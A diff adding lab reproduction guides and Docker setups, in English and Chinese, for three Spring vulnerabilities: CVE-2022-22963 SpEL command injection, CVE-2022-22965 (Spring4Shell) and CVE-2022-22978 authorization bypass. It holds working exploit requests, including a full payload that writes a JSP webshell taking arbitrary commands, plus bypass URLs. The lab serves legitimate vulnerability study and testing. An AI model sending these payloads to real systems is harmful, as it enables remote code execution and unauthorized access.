spring/CVE-2022-22963/README.zh-cn.md

@@ -0,0 +1,44 @@
+# Spring Cloud Function SpEL表达式命令注入（CVE-2022-22963）
+
+Spring Cloud Function 提供了一个通用的模型，用于在各种平台上部署基于函数的软件，包括像 Amazon AWS Lambda 这样的 FaaS（函数即服务，function as a service）平台。
+
+参考链接：
+
+- <https://tanzu.vmware.com/security/cve-2022-22963>
+- <https://mp.weixin.qq.com/s/onYJWIESgLaWS64lCgsKdw>
+- <https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f>
+
+## 漏洞环境
+
+执行如下命令启动一个使用Spring Cloud Function 3.2.2编写的服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，执行`curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test`即可执行`uppercase`函数，将输入字符串转换成大写。
+
+## 漏洞复现
+
+发送如下数据包，`spring.cloud.function.routing-expression`头中包含的SpEL表达式将会被执行：
+
+```
+POST /functionRouter HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
+Content-Type: text/plain
+Content-Length: 4
+
+test
+```
+
+![](1.png)
+
+可见，`touch /tmp/success`已经成功被执行：
+
+![](2.png)

spring/CVE-2022-22963/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-cloud-function:3.2.2
+   ports:
+    - "8080:8080"

spring/CVE-2022-22965/README.md

@@ -0,0 +1,62 @@
+# Spring Framework Data Binding Remote Code Execution on JDK 9+ (CVE-2022-22965)
+
+A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
+
+References:
+
+- <https://tanzu.vmware.com/security/cve-2022-22965>
+- <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/>
+
+## Vulnerability Environment
+
+Execute the following command to start a server that uses Spring WebMVC 5.3.17:
+
+```
+docker compose up -d
+```
+
+After server is started, browse the `http://your-ip:8080/?name=Bob&age=25` to see an example page.
+
+## Vulnerability Reproduce
+
+Send the following request to change the logging configuration in Apache Tomcat and write the log as a JSP file:
+
+```
+GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+suffix: %>//
+c1: Runtime
+c2: <%
+DNT: 1
+
+
+```
+
+![](1.png)
+
+Then, you can use the JSP webshell to execute arbitrary commands successfully:
+
+```
+http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=id
+```
+
+![](2.png)
+
+Noted that you should clear the `class.module.classLoader.resources.context.parent.pipeline.first.pattern` if you don't want the JSP webshell to be large, because every request logging will be written into that file. Send following request to clear the attribute:
+
+```
+GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern= HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```

spring/CVE-2022-22965/README.zh-cn.md

@@ -0,0 +1,66 @@
+# Spring框架Data Binding与JDK 9+导致的远程代码执行漏洞（CVE-2022-22965）
+
+在JDK 9+上运行的Spring MVC或Spring WebFlux应用程序可能存在通过数据绑定执行远程代码（RCE）的漏洞。
+
+现在已知的利用方法要求应用程序以WAR部署的形式在Tomcat上运行，然而，该漏洞的性质更为普遍，可能有其他方法可以利用它。
+
+参考链接：
+
+- <https://tanzu.vmware.com/security/cve-2022-22965>
+- <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/>
+
+## 漏洞环境
+
+执行如下命令启动一个Spring WebMVC 5.3.17服务：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080/?name=Bob&age=25`即可看到一个演示页面。
+
+## 漏洞复现
+
+发送如下数据包，即可修改目标的Tomcat日志路径与后缀，利用这个方法写入一个JSP文件：
+
+```
+GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+suffix: %>//
+c1: Runtime
+c2: <%
+DNT: 1
+
+
+```
+
+![](1.png)
+
+然后，访问刚写入的JSP Webshell，执行任意命令：
+
+```
+http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=id
+```
+
+![](2.png)
+
+注意，你需要在利用完成后将`class.module.classLoader.resources.context.parent.pipeline.first.pattern`清空，否则每次请求都会写入新的恶意代码在JSP Webshell中，导致这个文件变得很大。发送如下数据包将其设置为空：
+
+```
+GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern= HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```
+
+总体来说，这个漏洞的利用方法会修改目标服务器配置，导致目标需要重启服务器才能恢复，实际测试中需要格外注意。

spring/CVE-2022-22965/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-webmvc:5.3.17
+   ports:
+    - "8080:8080"

spring/CVE-2022-22978/README.md

@@ -0,0 +1,31 @@
+# Spring Security Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Spring Security framework is used to provide security authentication functionality in the Spring framework. In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
+
+References:
+
+- <https://tanzu.vmware.com/security/cve-2022-22978>
+- <https://github.com/DeEpinGh0st/CVE-2022-22978>
+
+## Vulnerability Environment
+
+Execute the following command to start a Web application based on Spring Security 5.6.3:
+
+```
+docker compose up -d
+```
+
+After the server starts, browse to <http://your-ip:8080/admin> to see that access to the admin page is blocked.
+
+![](forbidden.png)
+
+## Vulnerability Reproduce
+
+Send the following request to access the admin page that bypassed the authentication:
+
+- <http://your-ip:8080/admin/%0atest>
+- <http://your-ip:8080/admin/%0dtest>
+
+![](bypassed.png)

spring/CVE-2022-22978/README.zh-cn.md

@@ -0,0 +1,29 @@
+# Spring Security RegexRequestMatcher 认证绕过漏洞（CVE-2022-22978）
+
+Spring Security用于在Spring框架中提供安全认证功能。在Spring Security 5.5.6、5.6.3及更早的不受支持版本中，使用带有`.`的正则表达式的RegexRequestMatcher的应用程序可能存在认证绕过漏洞。
+
+参考链接：
+
+- <https://tanzu.vmware.com/security/cve-2022-22978>
+- <https://github.com/DeEpinGh0st/CVE-2022-22978>
+
+## 漏洞环境
+
+执行如下命令启动一个基于Spring Security 5.6.3的Web应用：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问<http://your-ip:8080/admin>，可以看到管理页面的访问被阻止。
+
+![](forbidden.png)
+
+## 漏洞复现
+
+发送以下请求来访问管理页面，成功绕过认证：
+
+- <http://your-ip:8080/admin/%0atest>
+- <http://your-ip:8080/admin/%0dtest>
+
+![](bypassed.png)

spring/CVE-2022-22978/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring-security:
+   image: vulhub/spring-security:5.6.3
+   ports:
+    - "8080:8080"